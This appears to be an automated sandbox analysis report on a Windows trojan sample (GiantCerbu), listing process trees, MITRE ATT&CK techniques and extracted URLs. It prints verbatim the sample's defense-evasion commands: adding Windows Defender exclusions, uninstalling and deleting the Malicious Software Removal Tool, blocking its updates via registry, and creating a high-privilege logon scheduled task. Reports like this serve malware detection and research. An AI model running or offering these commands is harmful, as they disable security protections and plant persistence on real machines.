Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1674564791.00000245B11CC000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1674564791.00000245B124A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V Hypervisor
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1651759830.00000245B0E41000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1652899480.00000245B0E4D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1652596169.00000245B0E4D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1652293425.00000245B0E4D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1652771513.00000245B0E4D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max 
Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe | API call chain: ExitProcess graph end node graph_24-17770
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe | Process information queried: ProcessInformation
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe | Code function: 24_2_00007FF6D9DBF6C0 IsDebuggerPresent,24_2_00007FF6D9DBF6C0
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe | Code function: 24_2_00007FF6D9CF1680 RtlReAllocateHeap,GetErrorInfo,SafeArrayDestroy,ProcessPrng,GetProcessHeap,HeapAlloc,GetErrorInfo,VariantClear,GetProcessHeap,HeapFree,VariantClear,HeapFree,HeapFree,HeapFree,HeapFree,SafeArrayDestroy,GetErrorInfo,HeapFree,HeapFree,24_2_00007FF6D9CF1680
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe | Code function: 24_2_00007FF6D9DD8D8C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,24_2_00007FF6D9DD8D8C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe | Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath @($env:ProgramData, 'C:\Users\Public') -ExclusionExtension '.exe' -Force"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath @($env:ProgramData, 'C:\Users\Public') -ExclusionExtension '.exe' -Force"
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe | NtQueryInformationProcess: Indirect: 0x7FF6D9DCF3BC
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe | NtQueryInformationProcess: Indirect: 0x7FF6D9DCF455
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe | NtQueryInformationProcess: Indirect: 0x7FF6D9DCDEF5
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe | NtQueryInformationProcess: Indirect: 0x7FF6D9DCE06C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe | NtQueryInformationProcess: Indirect: 0x7FF60994161C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe | NtQueryInformationProcess: Indirect: 0x7FF6099414A8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe | NtQueryInformationProcess: Indirect: 0x7FF609942A25
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe | NtQueryInformationProcess: Indirect: 0x7FF60994298C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath @($env:ProgramData, 'C:\Users\Public') -ExclusionExtension '.exe' -Force"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe | Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c "wusa /uninstall /kb:890830 /quiet /norestart"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe | Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c "del /f /q %SystemRoot%\System32\MRT.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe | Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c "reg add HKLM\SOFTWARE\Policies\Microsoft\MRT /v DontOfferThroughWUAU /t REG_DWORD /d 1 /f"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe | Process created: C:\Users\Public\Pictures_Old\AppData_Old\SppExtComObj.exe "C:\Users\Public\Pictures_Old\AppData_Old\SppExtComObj.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe | Process created: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe "C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe reg add HKLM\SOFTWARE\Policies\Microsoft\MRT /v DontOfferThroughWUAU /t REG_DWORD /d 1 /f
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe | Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c "schtasks /Create /TR C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe /SC ONLOGON /TN TMPSYSUPD /F /RL highest"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\schtasks.exe schtasks /Create /TR C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe /SC ONLOGON /TN TMPSYSUPD /F /RL highest
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1719566246.00000245B120C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1690429758.00000245B120C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Shell_TrayWnd|
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1719566246.00000245B120C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1690429758.00000245B120C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe | Queries volume information: C:\Users\Public\Pictures_Old\AppData_Old\SppExtComObj.exe VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe | Queries volume information: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Users\Public\Pictures_Old\AppData_Old\SppExtComObj.exe | Code function: 23_2_00007FF684C84A40 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,23_2_00007FF684C84A40
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntiVirusProduct
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntiVirusProduct
MITRE ATT&CK Matrix (rendered table; tactic columns): Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Techniques shown with counts in the matrix: Windows Management Instrumentation; Scheduled Task/Job; Process Injection; Masquerading; System Time Discovery; Archive Collected Data; Encrypted Channel; Registry Run Keys / Startup Folder; Modify Registry; Security Software Discovery; Clipboard Data; Native API; DLL Side-Loading; Abuse Elevation Control Mechanism; Virtualization/Sandbox Evasion; Image File Execution Options Injection; Disable or Modify Tools; Process Discovery; Application Window Discovery; System Information Discovery; Obfuscated Files or Information
Behavior Graph ID: 1543318 | Sample: SecuriteInfo.com.Variant.Gi... | Startdate: 27/10/2024 | Architecture: WINDOWS | Score: 100
Signatures at the sample node: Multi AV Scanner detection for submitted file; Sigma detected: Invoke-Obfuscation CLIP+ Launcher; Sigma detected: Invoke-Obfuscation VAR+ Launcher; 2 other signatures
Process tree (from the behavior graph):
SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe
    dropped: C:\Users\Public\...\SppExtComObj.exe, PE32+
    signatures: Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines); Creates an undocumented autostart registry key; Drops large PE files; 3 other signatures
    SgrmBroker.exe
        signatures: Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines); Queries memory information (via WMI often done to detect virtual machines); Found direct / indirect Syscall (likely to bypass EDR)
        cmd.exe
            conhost.exe
            schtasks.exe
    powershell.exe
        signatures: Loading BitLocker PowerShell Module
        WmiPrvSE.exe
        conhost.exe
    cmd.exe
        signatures: Uses schtasks.exe or at.exe to add and modify task schedules
        conhost.exe
        wusa.exe
    3 other processes
        conhost.exe
        conhost.exe
        reg.exe

Source | Detection | Scanner | Label | Link
SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe | 21% | ReversingLabs | Win64.Trojan.GiantCerbu |
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
No contacted domains info
Name | Source | Malicious | Antivirus Detection | Reputation
https://gameplayapi.intel.com/api/games/getagsgames2/P | SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1729098920.00000245B11F8000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1672507572.00000245B12C6000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2436170805.00000236ACC2F000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2407016314.00000236ACE05000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://nuget.org/NuGet.exe | powershell.exe, 0000000C.00000002.1959923759.0000021392240000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://gameplayapi.intel.com/api/games/getagsgamesettings2/B | SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1672507572.00000245B12E1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1729098920.00000245B11F8000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2436170805.00000236ACC2F000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2407016314.00000236ACE05000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://pesterbdd.com/images/Pester.pngXzy | powershell.exe, 0000000C.00000002.1942235658.00000213823FA000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe, 0000000C.00000002.1942235658.00000213823FA000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://go.microsoft.co | powershell.exe, 0000000C.00000002.1967642062.000002139A4FC000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://schemas.xmlsoap.org/soap/encoding/ | powershell.exe, 0000000C.00000002.1942235658.00000213823FA000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://gameplayapi.intel.com/api/games/getagsgames2/H | SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1729098920.00000245B11F8000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1672507572.00000245B12C6000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2436170805.00000236ACC2F000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2407016314.00000236ACE05000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 0000000C.00000002.1942235658.00000213823FA000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
http://www.microsoft.co | powershell.exe, 0000000C.00000002.1967642062.000002139A4FC000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://contoso.com/License | powershell.exe, 0000000C.00000002.1959923759.0000021392240000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://tst-gameplayapi.intel.com/api/games/getagsgamesettings2/u | SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1729098920.00000245B11F1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1728213124.00000245B11E6000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1672507572.00000245B12C0000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2436170805.00000236ACC28000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2407016314.00000236ACDFE000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://contoso.com/Icon | powershell.exe, 0000000C.00000002.1959923759.0000021392240000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://gameplayapi.intel.com/api/games/downloadthumbnail/.dllY | SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1729098920.00000245B11F8000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1672507572.00000245B12C6000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2436170805.00000236ACC2F000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2407016314.00000236ACE05000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://tst-gameplayapi.intel.com/api/games/getagsgamesettings2/Q | SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1729098920.00000245B11F8000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1672507572.00000245B12C6000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2436170805.00000236ACC2F000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2407016314.00000236ACE05000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://schemas.microsoft.c | powershell.exe, 0000000C.00000002.1967236251.000002139A336000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://tst-gameplayapi.intel.com/api/games/getagsgamesettings2/R | SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1729098920.00000245B11F1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1728213124.00000245B11E6000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1672507572.00000245B12C0000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2436170805.00000236ACC28000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2407016314.00000236ACDFE000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://tst-gameplayapi.intel.com/api/games/getagsgames2/y | SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1729098920.00000245B11F8000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1672507572.00000245B12C6000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2436170805.00000236ACC2F000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2407016314.00000236ACE05000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://gameplayapi.intel.com/api/games/getagsgamesettings2/ | SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1729098920.00000245B11F1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1672507572.00000245B12E1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1728213124.00000245B11E6000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1729098920.00000245B11F8000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1672507572.00000245B12C0000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1672507572.00000245B12C6000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2436170805.00000236ACC28000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2436170805.00000236ACC2F000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2407016314.00000236ACDFE000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2407016314.00000236ACE05000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://github.com/Pester/Pester | powershell.exe, 0000000C.00000002.1942235658.00000213823FA000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
http://www.apache.org/licenses/LICENSE-2.0.htmlXzy | powershell.exe, 0000000C.00000002.1942235658.00000213823FA000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://gameplayapi.intel.com/api/games/getagsgames2/y | SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1729098920.00000245B11F8000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1672507572.00000245B12C6000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2436170805.00000236ACC2F000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2407016314.00000236ACE05000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://cacerts.digicK | SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1683814431.00000245B10D9000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://github.com/Pester/PesterXzy | powershell.exe, 0000000C.00000002.1942235658.00000213823FA000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
                                                  https://tst-gameplayapi.intel.com/api/games/downloadthumbnail/BSecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1672507572.00000245B12E1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1729098920.00000245B11F8000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2436170805.00000236ACC2F000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2407016314.00000236ACE05000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    unknown
                                                    https://gameplayapi.intel.com/api/games/getagsgamesettings2/jSecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1672507572.00000245B12E1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1729098920.00000245B11F8000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2436170805.00000236ACC2F000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2407016314.00000236ACE05000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      unknown
                                                      https://tst-gameplayapi.intel.com/api/games/getagsgamesettings2/ZSecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1672507572.00000245B12E1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1729098920.00000245B11F8000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2436170805.00000236ACC2F000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2407016314.00000236ACE05000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        unknown
                                                        http://schemas.xmlsoap.org/wsdl/powershell.exe, 0000000C.00000002.1942235658.00000213823FA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          unknown
                                                          https://contoso.com/powershell.exe, 0000000C.00000002.1959923759.0000021392240000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            unknown
                                                            https://nuget.org/nuget.exepowershell.exe, 0000000C.00000002.1959923759.0000021392240000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              unknown
                                                              https://gameplayapi.intel.com/api/games/downloadthumbnail/SgrmBroker.exe, 00000018.00000003.2407016314.00000236ACE05000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                unknown
                                                                https://tst-gameplayapi.intel.com/api/games/getagsgames2/SgrmBroker.exe, 00000018.00000003.2407016314.00000236ACE05000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  unknown
                                                                  https://aka.ms/pscore68powershell.exe, 0000000C.00000002.1942235658.00000213821D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    unknown
